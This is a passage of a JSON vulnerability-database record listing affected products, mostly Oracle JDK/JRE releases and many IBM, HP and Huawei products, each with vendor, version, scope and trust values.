0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "bladecenter advanced management module 3.66k", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.840" }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.695" }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.8.020" }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 15", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 14", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.691" }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0:update 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7.067" }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7.067" }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.776" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.8.020" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.780" }, { "model": "jre update", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.6.034" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.6.035" }, { "model": "jdk 1.6.0 34", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "power express", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5200" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "jre update", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.6.041" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.1" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "power ps702", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.039" }, { "model": "jdk update17", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli netcool performance manager wireless", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "emptoris supplier lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.17" }, { "model": "(comware r2122", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79007)" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "system storage ts3310 tape library 640g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.3.4" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.6" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "notes and domino fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "oceanstor vis6600t v200r003c10spc400", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.4" }, { "model": "jdk update3", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.14" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.35" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.306" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "db2\u00ae connect? enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "db2\u00ae connect? application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "rational requirements composer ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.9.2" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.3" }, { "model": "infosphere discovery for zos", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "flex system chassis management module 2pet10k", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.42" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.025" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "java se embedded 7u71", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "rational automation framework ifix5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.2.1" }, { "model": "sametime community server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.04" }, { "model": "6127xlg", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355041980" }, { "model": "power systems 350.c0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "cloud manager interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "tivoli netcool performance manager wireless", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.3.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "tivoli netcool service quality manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "java sdk sr16-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "sterling control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.21" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.7.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.100" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.9.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.30" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "data server runtime client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "power systems 350.b1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "oceanstor v100r001c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7400" }, { "model": "system networking rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.170" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "z/tpf enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.06" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "sterling connect:direct browser user interface ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.208" }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.04" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "java sdk ga", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "data server driver package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "data server client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.00" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.3" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1200" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.41" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.36" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.00" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "te60 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "release control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.043" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13.0" }, { "model": "commonstore for lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "websphere real time sr", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "39" }, { "model": "smc2.0 v100r002c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "jre update3", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.15.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.1" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.6" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "endpoint manager for software use analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "s9700 v200r007c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.4.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "db2\u00ae enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.20" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.12" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.071" }, { "model": "data server driver for odbc and cli", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.00" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.32" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "smartcloud cost management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "sterling connect:direct browser ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.11.03" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.12" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.11" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.22" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "oceanstor replicationdirector v100r003c00spc400", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "websphere dashboard framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "flex system chassis management module 2peo12i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", 